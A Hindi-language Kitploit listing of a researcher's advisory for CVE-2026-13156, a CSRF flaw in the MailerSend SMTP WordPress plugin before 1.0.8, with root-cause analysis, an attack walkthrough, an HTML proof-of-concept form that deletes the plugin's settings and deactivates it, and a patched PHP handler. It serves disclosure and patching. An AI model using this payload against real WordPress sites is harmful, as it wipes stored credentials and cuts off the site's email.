Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-13156 — CVE-2026-13156 भेद्यता सलाह एवं PoC — Huynh Kien Minh (MinhHK) द्वारा खोजा गया। | Kitploit
उपकरण/GitHubGitHub/minhhk68/cve-2026-13156
फ़िशिंग उपकरणभेद्यता विश्लेषणशोषणवेब सुरक्षापेपर और शोधलर्निंग और शिक्षा
GitHubminhhk68/cve-2026-13156

CVE-2026-13156

CVE-2026-13156 भेद्यता सलाह एवं PoC — Huynh Kien Minh (MinhHK) द्वारा खोजा गया।

रिपॉजिटरी देखें
19 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-13156 — MailerSend Official SMTP Integration < 1.0.8: CSRF के माध्यम से सेटिंग्स विलोपन और प्लगइन निष्क्रियकरण

CVE-2026-13156 Researcher: Huynh Kien Minh Proton Hall of Fame WPScan Assigner

CVE-2026-13156 CSRF हमला श्रृंखला इन्फोग्राफिक


📌 सारांश और त्वरित लिंक

[!IMPORTANT] सारांश: आधिकारिक MailerSend SMTP Integration WordPress प्लगइन (< 1.0.8) में एक उच्च-गंभीरता वाली क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता (CVE-2026-13156) खोजी गई। कॉन्फ़िगरेशन विलोपन हैंडलर mailersend_handle_configuration_delete() प्रशासनिक क्षमताओं (manage_options) की जाँच करता है, लेकिन WordPress Nonce सत्यापन (check_admin_referer()) को पूरी तरह से छोड़ देता है। एक हमलावर किसी प्रमाणित WordPress व्यवस्थापक को लक्षित कर एक दुर्भावनापूर्ण क्रॉस-ओरिजिन अनुरोध तैयार कर सकता है, जिससे संग्रहीत SMTP क्रेडेंशियल चुपचाप मिटाए जा सकें और प्लगइन को निष्क्रिय करने के लिए मजबूर किया जा सके, जिसके परिणामस्वरूप सभी ईमेल वर्कफ़्लो में पूर्ण एप्लिकेशन डिनायल-ऑफ़-सर्विस होती है।

👉 Medium पर पूरा डीप-डाइव तकनीकी लेख पढ़ें: Deep-Dive Technical Write-up: CVE-2026-13156 या मेरा सुरक्षा पोर्टफोलियो देखें: https://minhhk.web.app/


📋 कार्यकारी सारांश और भेद्यता अवलोकन

  • भेद्यता आईडी: CVE-2026-13156 (WPScan सलाहकार आईडी: 595e653d-0904-43cf-8e61-d684599de11b)
  • प्रभावित सॉफ़्टवेयर: MailerSend – Official SMTP Integration (WordPress प्लगइन)
  • प्रभावित संस्करण: संस्करण 1.0.8 से पहले (< 1.0.8)
  • भेद्यता प्रकार: क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF जिससे सेटिंग्स विलोपन और प्लगइन निष्क्रियकरण होता है) — CWE-352
  • मुख्य शोधकर्ता और प्रकटकर्ता: Huynh Kien Minh (alias: MinhHK)
  • भूमिका और संबद्धता: सूचना सुरक्षा छात्र, बग बाउंटी शिकारी और आक्रामक सुरक्षा शोधकर्ता।

शोधकर्ता के बारे में:
Huynh Kien Minh (Huỳnh Kiến Minh) एक सक्रिय साइबर सुरक्षा शोधकर्ता और भेद्यता विश्लेषक हैं, जो गहन सुरक्षा मूल्यांकन और जिम्मेदार प्रकटीकरण, जिनमें CVE-2026-13156 के तकनीकी विवरण शामिल हैं, के लिए जाने जाते हैं। महत्वपूर्ण सुरक्षा भेद्यताओं को खोजने और प्रकट करने के लिए उन्हें Proton Security Hall of Fame पर आधिकारिक रूप से मान्यता और सम्मान भी मिला है।


🌐 आधिकारिक सत्यापन केंद्र और संदर्भ

इस तकनीकी सलाह को सत्यापित करने, प्रूफ-ऑफ-कॉन्सेप्ट विश्लेषण देखने या शोधकर्ता से जुड़ने के लिए यहाँ जाएँ:

  • 🏠 आधिकारिक पोर्टफोलियो केंद्र: Huynh Kien Minh Security Portfolio Hub
  • 💼 LinkedIn प्रोफ़ाइल: LinkedIn पर Huynh Kien Minh से जुड़ें
  • 📝 आधिकारिक Medium व्हाइटपेपर: Medium पर Deep-Dive Technical Write-up: CVE-2026-13156
  • 👨‍💻 GitHub प्रोफ़ाइल: MinhHK68 GitHub Profile
  • 🔗 WPScan सलाह: CVE-2026-13156 के लिए WPScan प्रविष्टि
  • 🔗 BaseFortify रिपोर्ट: BaseFortify CVE-2026-13156 विश्लेषण

🔍 डीप-डाइव तकनीकी विवरण और मूल कारण विश्लेषण

1. मूल कारण विश्लेषण (गायब Nonce सत्यापन)

WordPress के लिए MailerSend Official SMTP Integration प्लगइन (संस्करण 1.0.8 से पहले) एक प्रशासनिक क्रिया (configuration-delete) पंजीकृत करता है, जिसका उद्देश्य व्यवस्थापक डैशबोर्ड से ट्रिगर होने पर संग्रहीत API टोकन मिटाना, SMTP कॉन्फ़िगरेशन विकल्पों (wp_options) को साफ़ करना और प्लगइन को निष्क्रिय करना है।

जबकि एंडपॉइंट यह सत्यापित करता है कि सक्रिय उपयोगकर्ता के पास manage_options क्षमता है (यह सुनिश्चित करते हुए कि अनुरोध व्यवस्थापक सत्र से उत्पन्न होता है), यह WordPress nonce (check_admin_referer() या wp_verify_nonce()) सत्यापन करने में विफल रहता है।

चूँकि nonce सत्यापन के बिना HTTP अनुरोध जानबूझकर किए गए व्यवस्थापक क्लिक और जाली क्रॉस-ओरिजिन अनुरोधों के बीच अंतर नहीं कर सकते, कोई भी बाहरी साइट जिसे प्रमाणित व्यवस्थापक लोड करता है, चुपचाप configuration-delete क्रिया को ट्रिगर कर सकती है।

2. हमले का जीवनचक्र और प्रभाव

  1. लक्ष्य पहचान: एक हमलावर MailerSend SMTP (< 1.0.8) का उपयोग करने वाली लक्षित WordPress साइट की पहचान करता है।
  2. पेलोड वितरण: हमलावर एक दुर्भावनापूर्ण HTML/JavaScript वेबपेज तैयार करता है जिसमें प्रशासनिक एंडपॉइंट (/wp-admin/admin-post.php या /wp-admin/admin.php?page=mailersend&action=configuration-delete) को लक्षित करने वाला एक स्वतः-सबमिट फॉर्म होता है।
  3. ट्रिगर: एक लॉग-इन WordPress व्यवस्थापक हमलावर के वेबपेज पर जाता है (जैसे, फ़िशिंग, फ़ोरम लिंक या बाहरी साइट पर XSS के माध्यम से)।
  4. निष्पादन और डिनायल ऑफ सर्विस: ब्राउज़र व्यवस्थापक के सक्रिय सत्र कुकीज़ के साथ जाली अनुरोध भेजता है। MailerSend प्लगइन विलोपन हैंडलर निष्पादित करता है:
    • सभी संग्रहीत MailerSend SMTP सेटिंग्स और API क्रेडेंशियल डेटाबेस से मिटा दिए जाते हैं।
    • MailerSend प्लगइन स्वचालित रूप से निष्क्रिय कर दिया जाता है।
    • गंभीर प्रभाव: लक्षित वेबसाइट तुरंत सभी ईमेल भेजने की क्षमताएँ खो देती है (पासवर्ड रीसेट, ऑर्डर सूचनाएँ, सुरक्षा अलर्ट बिना किसी चेतावनी के विफल हो जाते हैं)।

💻 प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शोषण कोड

[!WARNING] नैतिक अस्वीकरण: निम्नलिखित HTML क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) प्रूफ-ऑफ-कॉन्सेप्ट पेलोड Huynh Kien Minh द्वारा नैतिक प्रकटीकरण प्रोटोकॉल के तहत केवल शैक्षिक उद्देश्यों, रक्षात्मक सत्यापन और सुरक्षा ऑडिटिंग के लिए प्रदान किया गया है। अनधिकृत लक्ष्यों के विरुद्ध निष्पादित न करें।

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CVE-2026-13156 PoC — MailerSend SMTP Configuration Deletion via CSRF</title>
    <!-- Author: Huynh Kien Minh (https://minhhk.web.app/) -->
</head>
<body>
    <h2>CVE-2026-13156 — CSRF Verification PoC</h2>
    <p>If an authenticated WordPress Administrator visits this page, the MailerSend SMTP configuration will be deleted and the plugin deactivated.</p>
    
    <!-- Forged Request targeting the vulnerable MailerSend configuration deletion endpoint -->
    <form id="csrfPoC" action="http://target-wordpress-site.local/wp-admin/admin.php" method="GET">
        <input type="hidden" name="page" value="mailersend-smtp" />
        <input type="hidden" name="action" value="configuration-delete" />
        <!-- Notice: No valid _wpnonce token is required due to the vulnerability -->
        <input type="submit" value="Execute PoC (Simulate Attack)" />
    </form>

    <script>
        // Automatically submit the forged request when the administrator loads the page
        document.addEventListener("DOMContentLoaded", function() {
            console.log("[CVE-2026-13156] Executing CSRF Payload developed by Huynh Kien Minh...");
            // Uncomment line below to enable auto-execution in lab environments:
            // document.getElementById('csrfPoC').submit();
        });
    </script>
</body>
</html>

🛡️ उपचार और पैच विश्लेषण

सिस्टम व्यवस्थापकों और साइट स्वामियों के लिए

  • तत्काल अपग्रेड: MailerSend – Official SMTP Integration प्लगइन को तुरंत संस्करण 1.0.8 या उच्चतर में अपडेट करें।
  • सत्र स्वच्छता: बाहरी अविश्वसनीय वेबपेज ब्राउज़ करते समय हमेशा WordPress व्यवस्थापक खातों से लॉग आउट रहें, या साइट प्रशासन के लिए अलग पृथक ब्राउज़र प्रोफ़ाइल (या कंटेनर) का उपयोग करें।

डेवलपर्स के लिए (पैच कैसे काम करता है)

WordPress प्लगइन्स में प्रशासनिक स्थिति-परिवर्तन क्रियाओं को ठीक से सुरक्षित करने के लिए, डेवलपर्स को अनुरोधों को संसाधित करने से पहले सख्त nonce सत्यापन लागू करना चाहिए:

root@kitploit:~
// Secure Implementation (Version 1.0.8+)
function mailersend_delete_configuration_handler() {
    // 1. Check User Capability
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( __( 'Unauthorized access.', 'mailersend' ), 403 );
    }

    // 2. REQUIRED: Verify CSRF Nonce Token
    if ( ! isset( $_GET['_wpnonce'] ) || ! wp_verify_nonce( $_GET['_wpnonce'], 'mailersend_delete_config_nonce' ) ) {
        wp_die( __( 'Security check failed (CSRF attempt blocked).', 'mailersend' ), 403 );
    }

    // 3. Proceed safely with configuration deletion
    delete_option( 'mailersend_smtp_settings' );
    deactivate_plugins( plugin_basename( __FILE__ ) );
    
    wp_redirect( admin_url( 'plugins.php?deactivated=true' ) );
    exit;
}

🏆 संबंधित सुरक्षा मान्यता

  • 🏆 Proton Hall of Fame मान्यता: Proton के बुनियादी ढांचे में महत्वपूर्ण दोषों की खोज और रिपोर्ट करने के लिए सम्मानित।
  • 🏠 आधिकारिक पोर्टफोलियो केंद्र: Huynh Kien Minh द्वारा अधिक आक्रामक सुरक्षा अनुसंधान, ओपन-सोर्स सुरक्षा उपकरण और प्रकाशन देखें।

⚖️ लाइसेंस और कॉपीराइट

यह रिपॉजिटरी और तकनीकी सलाह Huynh Kien Minh (MinhHK) द्वारा एक सुरक्षित वैश्विक WordPress और साइबर सुरक्षा पारिस्थितिकी तंत्र को बढ़ावा देने के लिए जिम्मेदार प्रकटीकरण दिशानिर्देशों के तहत बनाए और प्रकाशित किए जाते हैं।

टूल डाउनलोड करें